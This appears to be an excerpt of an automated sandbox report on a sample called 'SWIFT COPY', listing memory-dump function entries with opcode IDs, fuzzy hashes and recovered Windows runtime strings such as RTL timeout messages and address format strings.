                                                                                              • Opcode ID: 4a28559e8154344e4332eb8d36a64778f48e1b29e9312ddcee3ea44c927ad549
                                                                                              • Instruction ID: 7b1a8d53454827757eaf52a28716025bae2b9c084be96a885c97eb1eb9376dfd
                                                                                              • Opcode Fuzzy Hash: 4a28559e8154344e4332eb8d36a64778f48e1b29e9312ddcee3ea44c927ad549
                                                                                              • Instruction Fuzzy Hash: D9F0F0359026D48FE722CB1CC404B217FC89B8062CF08886AC58D8B542D321D880CA48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eacc27b9f092d5e8654f7067d2b7206f821e3ed7027db75e75aa053084fd6b9c
                                                                                              • Instruction ID: 283589124038a87f7a40d56533aa31989e3e9764dcf531993b4e93e2724b38b1
                                                                                              • Opcode Fuzzy Hash: eacc27b9f092d5e8654f7067d2b7206f821e3ed7027db75e75aa053084fd6b9c
                                                                                              • Instruction Fuzzy Hash: 48F0277E5167D006CF365F2C64542D12FA6A756018F5A104DDAA167217C97484C3C724
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fc01e45632359b7f67b22571623df58b46c36adfe24154223910e77e97e2d85e
                                                                                              • Instruction ID: cf2a9fd3f4e5153705ab5c925ecf8790c0300b964625e48ccc3e37eb8c8057b0
                                                                                              • Opcode Fuzzy Hash: fc01e45632359b7f67b22571623df58b46c36adfe24154223910e77e97e2d85e
                                                                                              • Instruction Fuzzy Hash: 7DF0B871511A919BE7229B1CC148B21BBECAB007BCF0CF426D5CA8795AC264FC84CA98
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                              • Instruction ID: a77f7974ec07dfe0f0eb0fd0e207abbb978df57bcc96627393ba6cf9a0f80987
                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                              • Instruction Fuzzy Hash: 6BE0D8723006012BE7329E5D8CC0F4777AEEFD2B28F04007AB5045F251C9E6DC0982A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                              • Instruction ID: beb287c2ae8121b03afc1691e0c9f0ab453b01433fbb1e734d85560a27d7174c
                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                              • Instruction Fuzzy Hash: 2BF065B2108214DFE3218F49D945F52B7FCEB05768F45C029E609AB661D379EC40CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                              • Instruction ID: 618ac1627af7dc219b6032460376b5038500777092084810e114fbb3c6c8fa6a
                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                              • Instruction Fuzzy Hash: ADF065392087559BDB1BDF29D050A957BE8FB95358B040095F8468B351D731E981CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: afd0ba13f8b4678a83b0d0c1c478378bf200dc019d76334adddf358fc44b9f55
                                                                                              • Instruction ID: d97b7f59738d01d3adb242628f7dd3b4f4df066e93e51a01b6a0a062b5570aec
                                                                                              • Opcode Fuzzy Hash: afd0ba13f8b4678a83b0d0c1c478378bf200dc019d76334adddf358fc44b9f55
                                                                                              • Instruction Fuzzy Hash: 6090023560590012E140725C48C45469006A7E0305B95C051E0424558CCA188A5A5361
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0190728cfb6f1ec40bcf15c474004c7c85a66b7e608faccc99946f5922ee9029
                                                                                              • Instruction ID: 788ec19b248839133562400b3571c8a0d965f780fc51415c29b2ddb796baf8e2
                                                                                              • Opcode Fuzzy Hash: 0190728cfb6f1ec40bcf15c474004c7c85a66b7e608faccc99946f5922ee9029
                                                                                              • Instruction Fuzzy Hash: 0C900265601600429140725C4844406B006A7E13053D5C155A0554564CC61C89599369
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 482eacb0c76a90642cd75a8b4505a3a14caba0648102230130612a3313e079ef
                                                                                              • Instruction ID: 606b26d0ff468d1d46f3bed3a3e27867ba54e352bc1dfd0838b64679320f60b3
                                                                                              • Opcode Fuzzy Hash: 482eacb0c76a90642cd75a8b4505a3a14caba0648102230130612a3313e079ef
                                                                                              • Instruction Fuzzy Hash: 0290023560550802E150725C4454746500697D0305F95C051A0024658DC7598B5977A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f2ef34bcd455b12dde065867368c8a6c6cc85a27c7135c1f2af917d0228670e
                                                                                              • Instruction ID: 2d5a20c72a80d7e9333be8ca7e9d0708821213c2fa43bf74d6f9e76c1a66ac5c
                                                                                              • Opcode Fuzzy Hash: 2f2ef34bcd455b12dde065867368c8a6c6cc85a27c7135c1f2af917d0228670e
                                                                                              • Instruction Fuzzy Hash: C790023520150802E104725C4844686500697D0305F95C051A6024659ED66989957231
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d1054be87d90840893b4b469abb6b6a565592c3df2b96fb0e2342b9d133efe2d
                                                                                              • Instruction ID: bafa182ab96ab0a9b6e7e93cfd6c83997ab0bc1b89bd25b4120f777a8e420a34
                                                                                              • Opcode Fuzzy Hash: d1054be87d90840893b4b469abb6b6a565592c3df2b96fb0e2342b9d133efe2d
                                                                                              • Instruction Fuzzy Hash: 8390023520150802E180725C444464A500697D1305FD5C055A0025658DCA198B5D77A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 842032b9c86026bc534b0ed58f419c8ce2defd44e76fb946f8033b8623f0ea98
                                                                                              • Instruction ID: 9bd1ed9fd654e753006f81abe9d59696c32c9844513fda347cb3e09b2074082d
                                                                                              • Opcode Fuzzy Hash: 842032b9c86026bc534b0ed58f419c8ce2defd44e76fb946f8033b8623f0ea98
                                                                                              • Instruction Fuzzy Hash: F090023520554842E140725C4444A46501697D0309F95C051A0064698DD6298E59B761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 627ed225925d45880b22a4b6ada99726e4e52cf258dd95d10dc0891289c4eda4
                                                                                              • Instruction ID: 281772535c1e77e931c663b555a9e20625948736d0a0935be209cf4d76b14461
                                                                                              • Opcode Fuzzy Hash: 627ed225925d45880b22a4b6ada99726e4e52cf258dd95d10dc0891289c4eda4
                                                                                              • Instruction Fuzzy Hash: C49002A5201640929500B35C8444B0A950697E0305B95C056E1054564CC52989559235
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 582458d073bad94ea21473cd9484aa25d96dfed6fa4a1ce9a72474eca334fa1d
                                                                                              • Instruction ID: eff6feff76f528350016913379b3e0aa94f24f6e9d92f734ac49450e13be32e3
                                                                                              • Opcode Fuzzy Hash: 582458d073bad94ea21473cd9484aa25d96dfed6fa4a1ce9a72474eca334fa1d
                                                                                              • Instruction Fuzzy Hash: E4900229221500025145B65C064450B5446A7D63553D5C055F1416594CC62589695321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d2df35c503f7b568da42a38c45d3ee30f0ced5a369394f51a2b339cd5a46a69d
                                                                                              • Instruction ID: c0f5ae66f5bc3d9750fc00f286ddad4b8c93eb7dd64e25fa6e9648b313872a97
                                                                                              • Opcode Fuzzy Hash: d2df35c503f7b568da42a38c45d3ee30f0ced5a369394f51a2b339cd5a46a69d
                                                                                              • Instruction Fuzzy Hash: 1890043D311500035105F75C07445075047D7D53553D5C071F1015554CD735CD755331
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c389a65c8e2e0cad6aaa00256569f87c22291e1cbf168eb46d578327e3df48d
                                                                                              • Instruction ID: 2bca55b3aee75c878f365ee787a658749b9a3e1ba192032dcd67b91f49d7f895
                                                                                              • Opcode Fuzzy Hash: 0c389a65c8e2e0cad6aaa00256569f87c22291e1cbf168eb46d578327e3df48d
                                                                                              • Instruction Fuzzy Hash: EE90022530150003E140725C54586069006E7E1305F95D051E0414558CD919895A5322
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8a4e4ea723f81ba3980b1bf7196233e562ad57edbb4b45faa7dc56a29e0ba4cf
                                                                                              • Instruction ID: a19c0b49b695ee36febc72647684606ef62d50b5b5212cbd93af5c9562f643e9
                                                                                              • Opcode Fuzzy Hash: 8a4e4ea723f81ba3980b1bf7196233e562ad57edbb4b45faa7dc56a29e0ba4cf
                                                                                              • Instruction Fuzzy Hash: 2F90022D21350002E180725C544860A500697D1306FD5D455A001555CCC919896D5321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 594c59761d7fb3a160282a1f1f18219f9c56cf8110537a65a794b449056fd516
                                                                                              • Instruction ID: 70ac5801a6d47b03edaeea4ea9a081cd0e0f4e1e0fc0ce3ec0c1dbbbe0ca5c80
                                                                                              • Opcode Fuzzy Hash: 594c59761d7fb3a160282a1f1f18219f9c56cf8110537a65a794b449056fd516
                                                                                              • Instruction Fuzzy Hash: 8090022520554442E100765C5448A06500697D0309F95D051A1064599DC6398955A231
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 37ffd6712929c63db78a807128eb0a8f03ee95384dd8bbd8dc4bed056ec9075c
                                                                                              • Instruction ID: 6b155f44085efaf6d905d815fb7248b55bb61e933bc58a49e8af02acd45e0a86
                                                                                              • Opcode Fuzzy Hash: 37ffd6712929c63db78a807128eb0a8f03ee95384dd8bbd8dc4bed056ec9075c
                                                                                              • Instruction Fuzzy Hash: 5590023524150402E141725C4444606500AA7D0345FD5C052A0424558EC6598B5AAB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 315ad6d6e52ad63720dbcffabf446f827a077c8e1053b84509ba91650431c587
                                                                                              • Instruction ID: ce365e6772ec94ed08a19b1f551c4d9f50eed2fec62dbbe3e9b94e5d1f7fd7f6
                                                                                              • Opcode Fuzzy Hash: 315ad6d6e52ad63720dbcffabf446f827a077c8e1053b84509ba91650431c587
                                                                                              • Instruction Fuzzy Hash: AA90022524254152A545B25C44445079007A7E03457D5C052A1414954CC52A995AD721
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3fcf554303bac7e9b2f4ead5878e04c8dc0746b323395398313dac7820a7df32
                                                                                              • Instruction ID: c7f33171ea8ecf04856039a13d717e75fbe3a01351bdf91b5ab4f47bd4eefe73
                                                                                              • Opcode Fuzzy Hash: 3fcf554303bac7e9b2f4ead5878e04c8dc0746b323395398313dac7820a7df32
                                                                                              • Instruction Fuzzy Hash: 7F90023520150842E100725C4444B46500697E0305F95C056A0124658DC619C9557621
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1fd89545d20f1cbc9fce2fef2434f6f54d57d91658fbb39fd930055819662956
                                                                                              • Instruction ID: e921dee6a91cefae2623dedf5efbd4e413bbe7379fc5158abf90a8d6e2c72cbb
                                                                                              • Opcode Fuzzy Hash: 1fd89545d20f1cbc9fce2fef2434f6f54d57d91658fbb39fd930055819662956
                                                                                              • Instruction Fuzzy Hash: 0C90023520150402E100769C5448646500697E0305F95D051A5024559EC66989956231
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: d92bcccd85640859e996fe03ce542956450e4e262e10a84a9290312c635c0f28
                                                                                              • Instruction ID: e333b3761ff90b9f2a5ee217b121884658db347e16ed784e3dcd27a9f5c0519e
                                                                                              • Opcode Fuzzy Hash: d92bcccd85640859e996fe03ce542956450e4e262e10a84a9290312c635c0f28
                                                                                              • Instruction Fuzzy Hash: CC51E9B6A0011ABFDB21DB9C889097FFBF8FB092487548169F4A5D7641D338DE54CBA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: 72206ab95083199f6f363f2e775078e5569028c994428690688886053dffc302
                                                                                              • Instruction ID: 76f04f98630897ae196f5679ee96f43361819252b2a514d5d228f493a7daf989
                                                                                              • Opcode Fuzzy Hash: 72206ab95083199f6f363f2e775078e5569028c994428690688886053dffc302
                                                                                              • Instruction Fuzzy Hash: 71512771A00769AECB34DF5CC99487FFBFCEB48208B048459E496D76C1E6B4EA008B60
                                                                                              Strings
                                                                                              • ExecuteOptions, xrefs: 013A46A0
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013A4742
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013A46FC
                                                                                              • Execute=1, xrefs: 013A4713
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013A4725
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 013A4787
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013A4655
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              • Opcode ID: 03b8fad483cfda1ff9ae21432ade82bc83e7dea4fede088eda522ba4b2133826
                                                                                              • Instruction ID: 509ee06940b61483d6c61f41dca989f004458c5af864d067e3ea6f7d1156e81f
                                                                                              • Opcode Fuzzy Hash: 03b8fad483cfda1ff9ae21432ade82bc83e7dea4fede088eda522ba4b2133826
                                                                                              • Instruction Fuzzy Hash: 9B513A3160021A7AEF25ABACDC85FFE7BACEF1431CF8440A9D605AB195E7719E418F50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction ID: 86f27e4e7d86800311f2250e9fe969ad2bd3b871c677e0a991e15bfa18467224
                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction Fuzzy Hash: 290236B1508342AFD306DF1AC490A6BBBF5EFD8714F01892EF9854B2A4DB31E945CB52
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction ID: 470b156cf234f08afcc079c49847853e6b6c16c9dab3c2851875f3defdd1f71d
                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction Fuzzy Hash: BC81C170E052899EEF358E6CC8917FEFFB5AF45328F184219D961A7299C73C9840CB61
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              • Opcode ID: 28c5ce875c19698058696f76d6f6de625824814ad1cc2b451c766f9f423aa4cd
                                                                                              • Instruction ID: cde21c3a4001a0db3a0fb1efe6b10d551d977032627b2230342c0ab67075aadc
                                                                                              • Opcode Fuzzy Hash: 28c5ce875c19698058696f76d6f6de625824814ad1cc2b451c766f9f423aa4cd
                                                                                              • Instruction Fuzzy Hash: 7B2135BAA00229ABDB11DF7DDC44AEF7BFCEF58658F440116E905E3240E735DA058BA1
                                                                                              Strings
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013A02BD
                                                                                              • RTL: Re-Waiting, xrefs: 013A031E
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013A02E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              • Opcode ID: dcc4e90e889269ff603df8c39a096385a4c50d065c77d49b6108b246f7b93b04
                                                                                              • Instruction ID: 002f0389849f4ec19e7709998b9949c16906c985a3468d9084fd588fb3dc9c32
                                                                                              • Opcode Fuzzy Hash: dcc4e90e889269ff603df8c39a096385a4c50d065c77d49b6108b246f7b93b04
                                                                                              • Instruction Fuzzy Hash: D2E1BF306047419FD765CF2CC884B6ABBE8FB84728F140A1DF9A58B6E1D774E944CB52
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 013A7B8E
                                                                                              • RTL: Re-Waiting, xrefs: 013A7BAC
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013A7B7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              • Opcode ID: 2edbee37509707ef1c0957d02d97a6d45f07e393d333342a3f5e97e10253dca5
                                                                                              • Instruction ID: 55b1460103fb33564f18e93f80f97f8e9040b9b894ecd13e9ca4563c6a40ccc2
                                                                                              • Opcode Fuzzy Hash: 2edbee37509707ef1c0957d02d97a6d45f07e393d333342a3f5e97e10253dca5
                                                                                              • Instruction Fuzzy Hash: 254105353007028FD725DE29CC40B66B7E9EF98718F004A2DFA5ADB694DB32E4098F91
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013A728C
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 013A72A3
                                                                                              • RTL: Re-Waiting, xrefs: 013A72C1
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013A7294
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              • Opcode ID: d9bad92fffbb93a9226d6c2ca22c0de84c08a6e84e2090d033e43c7208044240
                                                                                              • Instruction ID: 2883a186854c4be728b89df63716ee9d979b2499dd2ab2b967cd4e76a2bbb45b
                                                                                              • Opcode Fuzzy Hash: d9bad92fffbb93a9226d6c2ca22c0de84c08a6e84e2090d033e43c7208044240
                                                                                              • Instruction Fuzzy Hash: A3412431700206ABD721DE29CC81F66BBA9FF94718F104629F955EB644DB32F846CBD1
